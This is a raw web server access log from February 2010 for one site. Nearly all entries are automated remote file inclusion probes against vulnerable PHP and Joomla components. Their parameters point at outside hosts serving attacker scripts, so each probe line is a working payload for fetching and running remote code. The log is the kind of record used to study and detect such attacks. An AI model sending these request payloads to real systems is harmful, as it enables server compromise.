218.38.136.125 - - [14/Feb/2010:06:10:13 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:13 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:06:10:20 -0800] "GET /logs/access_100124.log/index2.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:26 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:26 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:26 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:10:37 -0800] "GET /logs/access_100208.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:45 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:45 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:45 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:10:56 -0800] "GET /logs/access_100126.log//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:10:56 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:10:57 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:10:57 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:11:05 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.42.249 - - [14/Feb/2010:06:11:08 -0800] "GET /logs//?board=http://www.officeok.co.kr/shop/eBook.pdf?? HTTP/1.1" 200 4947 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
221.143.42.249 - - [14/Feb/2010:06:11:08 -0800] "GET /logs/access_100119.log//?board=http://www.officeok.co.kr/shop/eBook.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
221.143.42.249 - - [14/Feb/2010:06:11:08 -0800] "GET /?board=http://www.officeok.co.kr/shop/eBook.pdf?? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:11:13 -0800] "GET /logs/access_100208.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:19 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:19 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:19 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:19 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:20 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:20 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:23 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:23 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:23 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:31 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:31 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:31 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:06:11:41 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:06:11:41 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:06:11:41 -0800] "GET /index.php?DOCUMENT_ROOT=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:11:43 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:11:43 -0800] "GET /logs//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:11:43 -0800] "GET /delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:45 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:45 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:11:46 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:11:55 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:06:12:18 -0800] "GET /logs/access_100129.log%20%20//ammember///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:06:12:20 -0800] "GET /logs/access.log%20%20//ammember///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:12:31 -0800] "GET /logs/access_100109.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:12:37 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:12:37 -0800] "GET /logs//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:12:37 -0800] "GET /delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:06:12:48 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:12:53 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:12:59 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:12:59 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:13:02 -0800] "GET /logs/access_100109.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:06:13:06 -0800] "GET /logs/access_100205.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:06:13:07 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:13:08 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:13:21 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:13:21 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:13:21 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:13:26 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:13:26 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:13:31 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [14/Feb/2010:06:14:09 -0800] "GET /ideal/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
200.226.134.29 - - [14/Feb/2010:06:14:12 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:14:16 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:14:16 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [14/Feb/2010:06:14:16 -0800] "GET /logs/access_100105.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:06:14:26 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:06:14:26 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:06:14:26 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:14:31 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:14:40 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:14:40 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:14:48 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:14:53 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:14:53 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.42.249 - - [14/Feb/2010:06:14:55 -0800] "GET /logs/access_100118.log//?board=http://www.officeok.co.kr/shop/eBook.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:14:56 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:14:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:14:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:14:59 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:14:59 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:14:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:15:05 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:15:11 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:06:15:14 -0800] "GET /logs/access_100118.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:06:15:27 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:15:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:15:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:15:31 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [14/Feb/2010:06:15:32 -0800] "GET /ideal/?S=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [14/Feb/2010:06:15:32 -0800] "GET /ideal/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
208.93.149.176 - - [14/Feb/2010:06:15:41 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:15:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:15:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:15:44 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:06:15:44 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:15:45 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [14/Feb/2010:06:15:54 -0800] "GET /ideal/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
208.93.149.176 - - [14/Feb/2010:06:16:24 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [14/Feb/2010:06:16:32 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:06:16:46 -0800] "GET /diger HTTP/1.0" 301 74 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [14/Feb/2010:06:16:47 -0800] "GET /diger/ HTTP/1.0" 200 3529 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:06:17:29 -0800] "GET /logs/access_100115.log%20%20//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:17:40 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:06:17:51 -0800] "GET /logs/access_100115.log%20%20//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:18:08 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:18:11 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [14/Feb/2010:06:18:13 -0800] "GET /ideal/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:29 -0800] "GET /search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:29 -0800] "GET /logs/access_100125.log/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:29 -0800] "GET /logs/search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:30 -0800] "GET /logs/access_100125.log/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:30 -0800] "GET /logs/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:30 -0800] "GET /search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:30 -0800] "GET /logs/access_100125.log/search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:30 -0800] "GET /logs/search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:30 -0800] "GET /search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:32 -0800] "GET /logs/access_100125.log/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:32 -0800] "GET /search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:32 -0800] "GET /logs/search.php?include_dir=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:33 -0800] "GET /logs/search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:33 -0800] "GET /logs/access_100125.log/search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:33 -0800] "GET /search.php?include_dir=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.105.125 - - [14/Feb/2010:06:19:34 -0800] "GET /search.php?include_dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
